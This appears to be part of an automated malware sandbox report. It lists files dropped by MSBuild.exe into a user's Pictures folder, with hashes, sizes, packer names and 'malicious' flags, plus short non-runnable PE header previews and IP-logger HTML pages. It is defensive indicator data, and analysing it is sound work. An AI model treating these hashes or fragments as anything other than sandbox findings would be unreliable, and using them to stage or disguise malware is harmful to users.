SSDEEP:	49152:fEOGfMr0UrM21zm6mVonU7JCGjh9FDrjop1jy50JtrD2sGxgLJ+r8+NSR63xrO0s:rtr0CnnGJCGl9GDnrNGaLJ5RKxy
MD5:	5C0D04CCD0CBCD8CC90A502DF8B512E7
SHA1:	0F905A137B801A69CF498FC0F8C5F00E75C5E689
SHA-256:	BC84C3A9CFEB083FE41A238C55EA3163B5C9E5103FEE0A7D7F4D8A1236B6D22D
SHA-512:	2D8D2630D4C362C67BC54BAD9B49DD0B11A5B9623CF106099B141E3FCF66D8032A3B855169BD636FEBFE517F0C8581DF62F70E77AF3C9CC7691AC407F7391D23
Malicious:	true
Reputation:	unknown
Preview:	MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......f.........."....'.....r.......Qp........@..............................r.....x.3... ..................................................Pp......`p..E...en......F\.h....................................\p.(....................Pp.`............................MPRESS1.@p.......0......................MPRESS2.....Pp.......0..................rsrc....E...`p..F....0.............@..............................................................v2.19....0. ../;.,...p.#..JNy..P..{....I..W._...d......N. ^f.3...u...J......=.K\3.p...1....L.a...y.!.....}.\|.......1..K.l...Fl'......:..D.yfcOh.p..i.Ki>......d.Yc.C&J.0..P+.....`.M.....R..s.;.n.t.......%.....II4u. .......f_..+...\|.._.!.v.r...d..O..L.G...HZ...`....p.cy..n..........G..Bq.9#Q.......RU.?f.:.....a..'..>G.X{.........g....B(.....X.gu>M~...;...A2..<..........`.*~......pYs..p3g).Yr......n...a.K.i.Nd56.&J.'...r.n...T...Z..F.pK.\|.I$.u..W.Z..A.!....z.o\|.....f<

C:\Users\user\Pictures\MpHOHCEEUzMhd1hQeZRzVhhz.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	461825
Entropy (8bit):	7.236344410199689
Encrypted:	false
SSDEEP:	6144:D6k7Z5ysHkE/g5dUlUjnwuhDBOT83WqF18VmfEhglcQ78N3No:uIDymkE/MdGGnwsDEgGM8o1zwN9o
MD5:	AF2E668BC00063EB9E5B60BE6A127471
SHA1:	7BCDA8AF4AF5256C5CA96B7CC023EA34A476DD48
SHA-256:	5F9CA0C9DD86870D4A73C89F9BF8613116050DB4A041D9F15B1939C9FA4DDA1F
SHA-512:	0F426972949DB6069123AC75A047D7D70C7B61EA40A04090C65CF7EEFE784F870ED8C961B915514D6053FC84121CB51B20D82D78D734A4F6B6F60680D68BF5AF
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...q..c.....................6.......i............@................................9........................................?..P.......i...........................0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data...h....P.......6..............@....rsrc...i............&..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\Mpw4JlCHhiliCOOFY4izjnxd.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\NfgsIliNy2FIhgIHRMVtFDp6.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	461825
Entropy (8bit):	7.236343038158279
Encrypted:	false
SSDEEP:	6144:D6k7Z5ysHkE/g5dUlUjnwuhDBOT83WqF18VmfEhglcQ78N3Nv:uIDymkE/MdGGnwsDEgGM8o1zwN9v
MD5:	DC66D8F64F9DE14A95471083A50D5188
SHA1:	E06B3F30A66DFBC6AEFEFE1C624C1A4C3D87971D
SHA-256:	529B02677E4645C0A5700FA22008E6BC122F13249CCBC4A2D70D2B359885EBCA
SHA-512:	731823870519B8F1854E8FA598A832F238D562FD6991625B50DFA3B166C80D985F0A5544B85F39357688FEDB631AEBE1DC8C8EFDB1A779C183A33DD177AA4C55
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...q..c.....................6.......i............@................................9........................................?..P.......i...........................0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data...h....P.......6..............@....rsrc...i............&..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\NzMhoMiQShLnUxfisrCBpUcg.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	461825
Entropy (8bit):	7.236343038158279
Encrypted:	false
SSDEEP:	6144:D6k7Z5ysHkE/g5dUlUjnwuhDBOT83WqF18VmfEhglcQ78N3Nv:uIDymkE/MdGGnwsDEgGM8o1zwN9v
MD5:	DC66D8F64F9DE14A95471083A50D5188
SHA1:	E06B3F30A66DFBC6AEFEFE1C624C1A4C3D87971D
SHA-256:	529B02677E4645C0A5700FA22008E6BC122F13249CCBC4A2D70D2B359885EBCA
SHA-512:	731823870519B8F1854E8FA598A832F238D562FD6991625B50DFA3B166C80D985F0A5544B85F39357688FEDB631AEBE1DC8C8EFDB1A779C183A33DD177AA4C55
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...q..c.....................6.......i............@................................9........................................?..P.......i...........................0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data...h....P.......6..............@....rsrc...i............&..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\OW0IY6qIxwA2vBNesoWOn7tx.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5388160
Entropy (8bit):	6.884124042562601
Encrypted:	false
SSDEEP:	98304:Q0NFR6666666666666666666666666666666x666666666666666fwwwwwwwwwwG:pPMki6zio75L3pf3dedO4keCIwkoYbgm
MD5:	349EAAECEF28C84C2ECECEF96887132F
SHA1:	4910C2D6657D59286E7FD70FFB92AE149FA1AC23
SHA-256:	703A0BC7861484748E44EA94C65B039C1BE533EDCF224047954DE0613873AED5
SHA-512:	D5CC6ED7A639E15F3452D397A7EB3FE2AF652CF9877950AE0A95F6F440FCDEB31DFAA4269DD4079A1A3D7914F8821618566CC1EACACB5053BC3A66246182F6EC
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...zL.f.........."......Z....M.....\|*............@..........................`R.....N.R...@.....................................P........{L...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....{L......\|L..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\PX9pw9BSDC6GcNiwEOwN9eIo.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\QGd5vowLDGLbl9fCzFQRFDz6.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	461825
Entropy (8bit):	7.236344410199689
Encrypted:	false
SSDEEP:	6144:D6k7Z5ysHkE/g5dUlUjnwuhDBOT83WqF18VmfEhglcQ78N3No:uIDymkE/MdGGnwsDEgGM8o1zwN9o
MD5:	AF2E668BC00063EB9E5B60BE6A127471
SHA1:	7BCDA8AF4AF5256C5CA96B7CC023EA34A476DD48
SHA-256:	5F9CA0C9DD86870D4A73C89F9BF8613116050DB4A041D9F15B1939C9FA4DDA1F
SHA-512:	0F426972949DB6069123AC75A047D7D70C7B61EA40A04090C65CF7EEFE784F870ED8C961B915514D6053FC84121CB51B20D82D78D734A4F6B6F60680D68BF5AF
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...q..c.....................6.......i............@................................9........................................?..P.......i...........................0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data...h....P.......6..............@....rsrc...i............&..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\QHSpBJfT7rENIQ9ncyZXQ7Pm.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	461825
Entropy (8bit):	7.236344410199689
Encrypted:	false
SSDEEP:	6144:D6k7Z5ysHkE/g5dUlUjnwuhDBOT83WqF18VmfEhglcQ78N3No:uIDymkE/MdGGnwsDEgGM8o1zwN9o
MD5:	AF2E668BC00063EB9E5B60BE6A127471
SHA1:	7BCDA8AF4AF5256C5CA96B7CC023EA34A476DD48
SHA-256:	5F9CA0C9DD86870D4A73C89F9BF8613116050DB4A041D9F15B1939C9FA4DDA1F
SHA-512:	0F426972949DB6069123AC75A047D7D70C7B61EA40A04090C65CF7EEFE784F870ED8C961B915514D6053FC84121CB51B20D82D78D734A4F6B6F60680D68BF5AF
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...q..c.....................6.......i............@................................9........................................?..P.......i...........................0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data...h....P.......6..............@....rsrc...i............&..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\QxCv5P4RWl5NZ4tvZO0mZrz2.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\RTdjK9qJEXQ928Kc9bfdj8uO.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	461825
Entropy (8bit):	7.236344410199689
Encrypted:	false
SSDEEP:	6144:D6k7Z5ysHkE/g5dUlUjnwuhDBOT83WqF18VmfEhglcQ78N3No:uIDymkE/MdGGnwsDEgGM8o1zwN9o
MD5:	AF2E668BC00063EB9E5B60BE6A127471
SHA1:	7BCDA8AF4AF5256C5CA96B7CC023EA34A476DD48
SHA-256:	5F9CA0C9DD86870D4A73C89F9BF8613116050DB4A041D9F15B1939C9FA4DDA1F
SHA-512:	0F426972949DB6069123AC75A047D7D70C7B61EA40A04090C65CF7EEFE784F870ED8C961B915514D6053FC84121CB51B20D82D78D734A4F6B6F60680D68BF5AF
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...q..c.....................6.......i............@................................9........................................?..P.......i...........................0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data...h....P.......6..............@....rsrc...i............&..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\RoyNg8B8qjQgITKbssh3ShCc.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\RqikXgL90rwJFOFaZuJPlBKd.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\RvrkjxBwedY81Y68Ne47TzMs.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7446
Entropy (8bit):	5.422209848736349
Encrypted:	false
SSDEEP:	192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:	5B423612B36CDE7F2745455C5DD82577
SHA1:	0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:	E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:	C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

C:\Users\user\Pictures\SlwT2Dhb0jcRK2apeSa3FdHE.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7446
Entropy (8bit):	5.422209848736349
Encrypted:	false
SSDEEP:	192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:	5B423612B36CDE7F2745455C5DD82577
SHA1:	0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:	E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:	C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

C:\Users\user\Pictures\TB8gyY0giMN6fcZjZLzipP7P.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5388160
Entropy (8bit):	6.884123026493015
Encrypted:	false
SSDEEP:	98304:d0NFR6666666666666666666666666666666x666666666666666fwwwwwwwwwwm:2PMki6zio75L3pf3dedO4keCIwkoYbgG
MD5:	B94E72B3589D145678684496BCBAB477
SHA1:	57C159C07B85B1D01E57B20063B43D3337BFBF06
SHA-256:	3EAB2788D2375325BFF7128698032CCF09E90001E0A6737F2B097613FE057ABF
SHA-512:	9CDDCEC509A84E3DB8CF40E927536BE1339D60078E10A7BA0392B4788219335AC604196E926AFBBFF82B1F82336A2D157BEB656558D0498FFEBCF334217A4F1E
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...zL.f.........."......Z....M.....\|*............@..........................`R.......R...@.....................................P........{L...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....{L......\|L..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\TjI0ijcIo0xtphiVp90L9Ox0.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\VScSUh49U4ILUy7wHZccpWfB.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	461825
Entropy (8bit):	7.236344410199689
Encrypted:	false
SSDEEP:	6144:D6k7Z5ysHkE/g5dUlUjnwuhDBOT83WqF18VmfEhglcQ78N3No:uIDymkE/MdGGnwsDEgGM8o1zwN9o
MD5:	AF2E668BC00063EB9E5B60BE6A127471
SHA1:	7BCDA8AF4AF5256C5CA96B7CC023EA34A476DD48
SHA-256:	5F9CA0C9DD86870D4A73C89F9BF8613116050DB4A041D9F15B1939C9FA4DDA1F
SHA-512:	0F426972949DB6069123AC75A047D7D70C7B61EA40A04090C65CF7EEFE784F870ED8C961B915514D6053FC84121CB51B20D82D78D734A4F6B6F60680D68BF5AF
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...q..c.....................6.......i............@................................9........................................?..P.......i...........................0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data...h....P.......6..............@....rsrc...i............&..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\XOhApkVOUtZE8u9vX17eosOR.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6132736
Entropy (8bit):	7.152487916364851
Encrypted:	false
SSDEEP:	98304:mkpa5UKdCrbpaah6k5u6yA6nE0w5jjvjjjjl5S/hdIOrd/ClFkydIy3rBld3:m3fdCxaah75uUSw5jjvjjjj3dOr5TLyF
MD5:	BE94B480184550913C269E35A13AD28C
SHA1:	57C2F9CBEB17F80A540A6AEAFDD61F28443418CE
SHA-256:	40E1C85ADECCCC0D02B09681A421BA0457962BFD1A035A5BD234EC13C55AD2F4
SHA-512:	CB52C1D8E9D820A352FE6CB1DE21C80BB55512230C8287DB6C80A2C958CA23ECEA38C80480DEEF2A0E9157EFFEAE12E9868428404ACAD19A6D6F983A822580E3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.........."....'............X.%........@.............................`p.....kJ^...`...................................................!.......n..K....m...............n...............................!.(................................................... .........p.................. ..` Fp...........t..............@..@ .............X..............@... .....P.......j..............@..@ .....P......................@..@.ZiZ....5K...`...L..................@..@ .!....!......B..............@..@.idata........!......P..............@....tls..........!......R...................themida..K..."...K..T..............`....@2\|..........m......TZ.............@..H.reloc........n......F[................@.rsrc....K....n..L...H[.............@..@........................................................................................

C:\Users\user\Pictures\Xi37RtmryfYQA7AgXeZvjKIg.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	461825
Entropy (8bit):	7.236344410199689
Encrypted:	false
SSDEEP:	6144:D6k7Z5ysHkE/g5dUlUjnwuhDBOT83WqF18VmfEhglcQ78N3No:uIDymkE/MdGGnwsDEgGM8o1zwN9o
MD5:	AF2E668BC00063EB9E5B60BE6A127471
SHA1:	7BCDA8AF4AF5256C5CA96B7CC023EA34A476DD48
SHA-256:	5F9CA0C9DD86870D4A73C89F9BF8613116050DB4A041D9F15B1939C9FA4DDA1F
SHA-512:	0F426972949DB6069123AC75A047D7D70C7B61EA40A04090C65CF7EEFE784F870ED8C961B915514D6053FC84121CB51B20D82D78D734A4F6B6F60680D68BF5AF
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...q..c.....................6.......i............@................................9........................................?..P.......i...........................0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data...h....P.......6..............@....rsrc...i............&..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\YtkUkgpbmZlbSuZT81owPAOw.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7446
Entropy (8bit):	5.422209848736349
Encrypted:	false
SSDEEP:	192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:	5B423612B36CDE7F2745455C5DD82577
SHA1:	0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:	E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:	C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

C:\Users\user\Pictures\ZM1H78lrEQNEMSqAF8jMSK2I.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5388160
Entropy (8bit):	6.88412459887609
Encrypted:	false
SSDEEP:	98304:N0NFR6666666666666666666666666666666x666666666666666fwwwwwwwwwwg:mPMki6zio75L3pf3dedO4keCIwkoYbgA
MD5:	475B97C77C10688DFEB843F324F44D20
SHA1:	C2419717DDF08FA92CF3E2FC05CEE8A9BAE337B6
SHA-256:	95C82517B54EF8E75F58C9AFF66A120E600F622BC73DD5A7BDE31C2F3CBCB05C
SHA-512:	33B74103F55E90E241ACC0BA508BFBE9728700AC97062D33CB81C280C332065CD1A59304C96B81E1947126CA4B1B62E98C51321DED8CF03C4FC8E88FDAC4384D
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...zL.f.........."......Z....M.....\|*............@..........................`R......wR...@.....................................P........{L...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....{L......\|L..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

